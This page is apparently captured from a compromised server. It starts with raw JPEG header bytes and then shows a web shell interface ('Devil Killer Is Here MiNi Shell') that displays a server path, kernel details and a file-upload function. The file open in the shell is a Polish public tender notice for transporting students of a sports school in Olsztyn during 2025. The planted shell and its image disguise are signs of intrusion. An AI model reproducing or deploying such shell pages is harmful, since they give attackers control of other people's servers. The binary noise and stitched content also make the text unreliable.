JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241204/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20241204/0063197101-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Przewóz uczniów Zespołu Szkół Ogólnokształcących nr 5 Mistrzostwa Sportowego w Olsztynie pomiędzy obiektami szkoły oraz obiektami treningowymi w terminie 07.01.2025 r. – 19.12.2025 r </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Zespół Szkół Ogólnokształcących nr 5 Mistrzostwa Sportowego im. M.G. Bublewicza</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 510711960</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Jagiellończyka 32</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Olsztyn</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">10-062</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">warmińsko-mazurskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL622 - Olsztyński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">895340488</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">895340488</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@zso5.olsztyn.eu</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://zso5.olsztyn.eu</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przewóz uczniów Zespołu Szkół Ogólnokształcących nr 5 Mistrzostwa Sportowego w Olsztynie pomiędzy obiektami szkoły oraz obiektami treningowymi w terminie 07.01.2025 r. – 19.12.2025 r </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-7019308d-9669-4a5d-8983-e4980efd342b</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00631971</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-12-04</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://zamowienia.olsztyn.eu <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://zamowienia.olsztyn.eu</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Środki komunikacji elektronicznej, przy użyciu których Zamawiający będzie komunikował się z wykonawcami, oraz informacje o wymaganiach technicznych i organizacyjnych sporządzania, wysyłania i odbierania korespondencji elektronicznej<br/>1.	W postępowaniu o udzielenie zamówienia i komunikacja między Zamawiającym, a Wykonawcami odbywa się drogą elektroniczną przy użyciu Platformy Przetargowej Gminy Olsztyn, dostępnej pod adresem: https://zamowienia.olsztyn.eu.<br/>2.	Dokumenty elektroniczne, oświadczenia lub elektroniczne kopie dokumentów lub oświadczeń składane są przez Wykonawcę za pośrednictwem Formularza na Platformie Przetargowej Gminy Olsztyn do komunikacji jako załączniki.<br/>3.	Zgodnie z art. 63 ust. 2 Ustawy PZP1 ofertę składa się, pod rygorem nieważności, w formie elektronicznej (podpis kwalifikowany) lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym (nie jest to podpis odręczny lecz zaawansowany podpis elektroniczny).<br/><br/><br/>X.	Informacje o sposobie komunikowania się zamawiającego z wykonawcami <br/><br/>W przypadku zaistnienia jednej z sytuacji określonych w art. 65 ust. 1, art. 66 i art. 69 p.z.p. Zamawiający nie przewiduje sposobu komunikowania się z Wykonawcami w inny sposób, niż przy użyciu środków komunikacji elektronicznej, wskazanych w SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Realizując wymogi rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych „RODO&#34;), Zespół Szkół Ogólnokształcących nr 5 Mistrzostwa Sportowego im M.G. Bublewicza w Olsztynie pragnie przekazać Państwu informacje na temat przetwarzania Państwa danych osobowych w ZSO 5 MS , jak również poinformować o przysługujących Państwu prawach z tym związanych.<br/>1.	Administratorem danych osobowych jest Zespół Szkół Ogólnokształcących nr 5 Mistrzostwa Sportowego im M.G. Bublewicza w Olsztynie ul. Gietkowska 12, e- mail: sekretariat@zso5.olsztyn.eu.<br/>2.	Funkcję Inspektora Ochrony Danych pełni Sebastian Łabowski, adres e- mail: inspektor@bezpieczne-dane.eu.<br/>3.	Dane będą przetwarzane w celu wypełniania zadań ustawowych lub statutowych Administratora danych osobowych, na podstawie przepisów obowiązującego prawa, bądź w innych przypadkach na podstawie udzielonej zgody na przetwarzanie danych osobowych w celu określonym przy pozyskiwaniu przez Administratora danych osobowych przedmiotowej zgody.<br/>4.	Stosownie do art. 96 ust. 1 ustawy Pzp, zamawiający przechowuje protokół wraz z załącznikami przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a tym samym dane osobowe będą przechowywane przez w/w okres, a po tym czasie przez okres oraz w zakresie wymaganym przez przepisy powszechnie obowiązujące lub do upływu terminu przedawnienia roszczeń z tytułu wykonania lub nienależytego wykonania umowy.<br/>5.	W związku z przetwarzaniem danych osobowych w celach, o których mowa w punkcie 3, odbiorcami Państwa danych osobowych mogą być organy władzy publicznej oraz podmioty wykonujące zadania publiczne lub działające na zlecenie organów władzy publicznej, w zakresie i w celach, które wynikają z przepisów powszechnie obowiązującego prawa.<br/>6.	Podanie danych osobowych ma charakter dobrowolny jeżeli przetwarzanie danych osobowych odbywa się na podstawie zgody osoby, której dane dotyczą.<br/>7.	Podanie danych osobowych ma charakter obowiązkowy, jeżeli podstawę przetwarzania danych osobowych stanowi przepis prawa.<br/>8.	Podane dane osobowe nie będą przetwarzane w sposób zautomatyzowany i nie będą profilowane.<br/>9.	Osobie, której dane osobowe dotyczą przysługuje prawo dostępu do swoich danych osobowych, ich sprostowania, usunięcia lub ograniczenia przetwarzania, a także przenoszenia danych w zakresie wynikającym z przepisów prawa.<br/>10.	Osobie, której dane osobowe dotyczą przysługuje również prawo do wniesienia sprzeciwu wobec dalszego przetwarzania, a w przypadku wyrażenia zgody na przetwarzanie danych do jej wycofania. Skorzystanie z prawa do wniesienia sprzeciwu lub cofnięcia zgody nie ma wpływu na przetwarzanie, które miało miejsce do momentu sprzeciwu lub wycofania zgody.<br/>11.	Przysługuje Państwu prawo wniesienia skargi do organu nadzorczego – Prezesa Urzędu Ochrony Danych Osobowych.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZSO5.260.2.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przewóz uczniów Zespołu Szkół Ogólnokształcących nr 5 Mistrzostwa Sportowego <br/>w Olsztynie pomiędzy obiektami szkoły oraz obiektami treningowymi w terminie 07.01.2025 r. – 19.12.2025 r </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60130000-8 - Usługi w zakresie specjalistycznego transportu drogowego osób</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2025-01-07 do 2025-12-19</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Wszystkie oferty niepodlegające odrzuceniu oceniane będą na podstawie następujących kryteriów:	<br/>Kryterium 1 - cena – 90% <br/>Kryterium 2 – uśredniony rok produkcji 3-ch pojazdów przeznaczonych do realizacji zamówienia – 10%<br/>2.	Sposób oceny ofert dla kryterium 1 – cena:<br/>Przy ocenie ofert pod uwagę będzie brana cena brutto za całość zamówienia wskazana w formularzu ofertowym.<br/>Punktacja zostanie przydzielona zgodnie z poniższym wzorem;<br/>PK1= [CN / CR] x 100pkt X 90%<br/>PK1 - suma punktów dla kryterium, <br/>CN - najniższa oferowana cena spośród badanych ofert, <br/>CR - cena oferty badanej.<br/>Maksymalna do uzyskania ilość punktów w tym kryterium wynosi 90.<br/>3.	Sposób oceny ofert dla kryterium 2 – uśredniony rok produkcji 3-ch pojazdów przeznaczonych do realizacji zamówienia:<br/>Wykonawca wykazuje pojazdy przeznaczone do wykonania zamówienia w formularzu ofertowym – pkt.2 zał.nr 1 do SWZ.<br/>Zamawiający obliczy średnią arytmetyczną wg poniższego wzoru;<br/>(rok prod.pojazdu 1) + (rok prod. pojazdu 2) + (rok prod. pojazdu 3)	= średnia roku produkcji pojazdów / (dzielone przez ilość pojazdów) 3 <br/><br/>Wynik powyższego działania będzie podstawą przyznania odpowiedniej, niżej wymienionej ilości punktów;<br/>Za uśredniony rok produkcji trzech oferowanych pojazdów;<br/>a)	lata 2009 – 2011 – oferta otrzymuje 0 punktów,<br/>b)	lata 2012 - 2016 – oferta otrzymuje 5 punktów,<br/>c)	od 2017 r. – oferta otrzymuje 10 punktów.<br/>Maksymalna do uzyskania ilość punktów w tym kryterium wynosi 10.<br/><br/>4.	Zmiana oferowanego pojazdu na inny po wyborze oferty oraz w trakcie badania oferty jest dopuszczalna przy zachowaniu warunku, że rok produkcji zmienionego pojazdu będzie mieścił się w przedziale, wskazanym w formularzu oferty, na podstawie którego dokonano wyboru oferty, a nowy pojazd będzie spełniał wszystkie wymagania SWZ.<br/><br/>5.	Uzasadnienie zwiększenia kryterium ceny powyżej 60%<br/>Zwiększenie kryterium ceny do 90% przez Zamawiającego jest podyktowane faktem, że zamawiana usługa jest powszechna i świadczona przez Wykonawców zbliżonymi technicznie środkami transportu.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">90</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">uśredniony rok produkcji 3-ch pojazdów przeznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu zgodnie z pkt. VI SWZ na podstawie art. 108 ust. 1 i art. 109 ust. 1 pkt 4 Ustawy PZP i spełniają następujące warunki udziału w postępowaniu:<br/><br/>A.	Zdolność do występowania w obrocie gospodarczym<br/><br/>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.<br/><br/>B.	Uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów.<br/><br/>Zamawiający w postępowaniu o udzielenie zamówienia wymaga udowodnienia posiadania aktualnego zezwolenia/licencji na Zezwolenie na wykonywanie regularnych specjalnych przewozów osób w krajowym transporcie drogowym lub zezwolenie na wykonywanie regularnych specjalnych przewozów osób w międzynarodowym transporcie drogowym zgodnie z art.18 ust.1 Ustawy z dnia 6 września 2001r. o transporcie drogowym (t.j. Dz.U. 2024 poz. 1539).<br/><br/>C.	Sytuacja ekonomicznej lub finansowej<br/><br/>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.<br/><br/>D.	Zdolności techniczne lub zawodowe <br/><br/>1.	Zamawiający w tym zakresie określa następujące minimalne warunki udziału w postępowaniu: <br/>1.1.	wykonawca posiada zezwolenie/licencję na wykonywanie zawodu przewoźnika drogowego w zakresie przewozu osób, zgodnie z przepisami ustawy z dnia 6 września 2001r. o transporcie drogowym (t.j. Dz.U. 2024 poz. 1539), <br/>1.2.	wykonawca, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał lub wykonuje minimum jedno zamówienie polegające na świadczeniu usług przewozu osób przez okres obejmujący co najmniej 1 rok o wartości minimum 150 000 zł brutto.<br/>1.3.	wykonawca skieruje do realizacji zamówienia co najmniej jednego kierowcę dla każdego pojazdu wymaganego w zamówieniu, na którą wykonawca składa ofertę; <br/>-	spełniającego warunki określone w ustawie z dnia 6 września 2001 r. o transporcie drogowym (t.j. Dz.U. 2024 poz. 1539), <br/>-	posiadającego odpowiednie uprawnienie do kierowania pojazdem samochodowym, określone w ustawie z dnia 5 stycznia 2011 r. o kierujących pojazdami (t.j. Dz.U. 2024 poz. 1210),<br/>-	posiadającego aktualne przeszkolenia BHP i p. poż.,<br/>-	posiadającego zaświadczenie o niekaralności; <br/>1.4.	wykonawca dysponuje minimum 3-ma pojazdami, przystosowanymi do przewozu osób, spełniającymi wymogi, o których mowa w części III pkt. 10 SWZ, przy czym rok produkcji pojazdów nie może być wcześniejszy niż 2009. <br/><br/>2.	Celem wykazania braku podstaw do wykluczenia, o których mowa w pkt VI SWZ oraz spełnienia warunków udziału w postępowaniu, o których mowa w pkt VII SWZ Podmioty składają oświadczenia i dokumenty określone w części VIII SWZ - dotyczące braku podstaw wykluczenia i spełniania warunków. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">2.	Celem wykazania braku podstaw do wykluczenia, o których mowa w pkt VI SWZ oraz spełnienia warunków udziału w postępowaniu, o których mowa w pkt VII SWZ Podmioty składają oświadczenia i dokumenty określone w części VIII SWZ - dotyczące braku podstaw wykluczenia i spełniania warunków.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1.	Zamawiający w tym zakresie określa następujące minimalne warunki udziału w postępowaniu: <br/>1.1.	wykonawca posiada zezwolenie/licencję na wykonywanie zawodu przewoźnika drogowego w zakresie przewozu osób, zgodnie z przepisami ustawy z dnia 6 września 2001r. o transporcie drogowym (t.j. Dz.U. 2024 poz. 1539), <br/>1.2.	wykonawca, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał lub wykonuje minimum jedno zamówienie polegające na świadczeniu usług przewozu osób przez okres obejmujący co najmniej 1 rok o wartości minimum 150 000 zł brutto.<br/>1.3.	wykonawca skieruje do realizacji zamówienia co najmniej jednego kierowcę dla każdego pojazdu wymaganego w zamówieniu, na którą wykonawca składa ofertę; <br/>-	spełniającego warunki określone w ustawie z dnia 6 września 2001 r. o transporcie drogowym (t.j. Dz.U. 2024 poz. 1539), <br/>-	posiadającego odpowiednie uprawnienie do kierowania pojazdem samochodowym, określone w ustawie z dnia 5 stycznia 2011 r. o kierujących pojazdami (t.j. Dz.U. 2024 poz. 1210),<br/>-	posiadającego aktualne przeszkolenia BHP i p. poż.,<br/>-	posiadającego zaświadczenie o niekaralności; <br/>1.4.	wykonawca dysponuje minimum 3-ma pojazdami, przystosowanymi do przewozu osób, spełniającymi wymogi, o których mowa w części III pkt. 10 SWZ, przy czym rok produkcji pojazdów nie może być wcześniejszy niż 2009.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> W celu dokonania oceny oferty Wykonawcy, którego oferta jest najkorzystniejsza, Zamawiający dokona oględzin pojazdów przewidzianych do realizacji zamówienia oraz weryfikacji dokumentacji ze stanem faktycznym. <br/>Miejsce oraz czas oględzin zostanie wyznaczony w uzgodnieniu z Wykonawcą. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1.	Do oferty (składanej zgodnie z treścią załącznika nr 1) Wykonawca zobowiązany jest dołączyć aktualne na dzień składania ofert oświadczenie o spełnianiu warunków udziału w postępowaniu oraz o braku podstaw do wykluczenia z postępowania – zgodnie z Załącznikiem nr 2a i 2b do SWZ.<br/>2.	Informacje zawarte w oświadczeniu, o którym mowa w pkt 1 stanowią wstępne potwierdzenie, że Wykonawca nie podlega wykluczeniu oraz spełnia warunki udziału w postępowaniu.<br/>3.	Dokumenty składane w pkt. 1 muszą być złożone w formie elektronicznej (podpis kwalifikowany) lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.<br/>4.	W przedmiotowym postępowaniu o udzielenie zamówienia, Zamawiający żąda na postawie przepisu art. 273 ust. 1 ustawy Pzp - podmiotowych środków dowodowych, o których mowa w art. 125 ust. 1 ustawy Pzp oraz stosownych oświadczeń na potwierdzenie: <br/>a)	braku podstaw wykluczenia (Załącznik nr 2a do SWZ),<br/>b)	spełniania warunków udziału w postępowaniu (Załącznik nr 2b do SWZ).<br/>5.	Oświadczenia Wykonawcy dla potwierdzenia braku wykluczeń i spełniania warunków w postępowaniu, o których mowa w pkt. 1 powyżej stanowią dowód potwierdzający brak podstaw wykluczenia, spełnianie warunków udziału w postępowaniu na dzień składania ofert.<br/>1.	Zamawiający zgodnie z art. 274 ust. 1 Ustawy Pzp wzywa Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, poniższych podmiotowych środków dowodowych, aktualnych na dzień złożenia podmiotowych środków dowodowych:<br/>1.1.	W celu potwierdzenia braku podstaw wykluczenia Wykonawcy z udziału w postępowaniu o udzielenie zamówienia publicznego Zamawiający żąda: <br/>odpisu lub informacji z Krajowego Rejestru Sądowego lub Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt. 4 Ustawy PZP.<br/>1.2.	W celu potwierdzenia spełniania przez wykonawcę warunków udziału w postępowaniu dotyczących wymaganych uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, zamawiający żąda: <br/>aktualnej zezwolenia/licencji na wykonywanie zawodu przewoźnika drogowego w zakresie przewozu osób.<br/>1.3.	W celu potwierdzenia spełniania przez wykonawcę warunków udziału w postępowaniu dotyczących zdolności technicznej lub zawodowej, zamawiający żąda:<br/>1.3.1.	wykazu usług wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy, w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, wg wzoru określonego w załączniku nr 3 do SWZ, Wykaz winien dokumentować spełnienie warunków określonych w części VII D ust. 1 pkt.2 SWZ. Wykaz składany jest wg wzoru stanowiącego załącznik nr 3 do SWZ.<br/>1.3.2.	wykazu osób, skierowanych 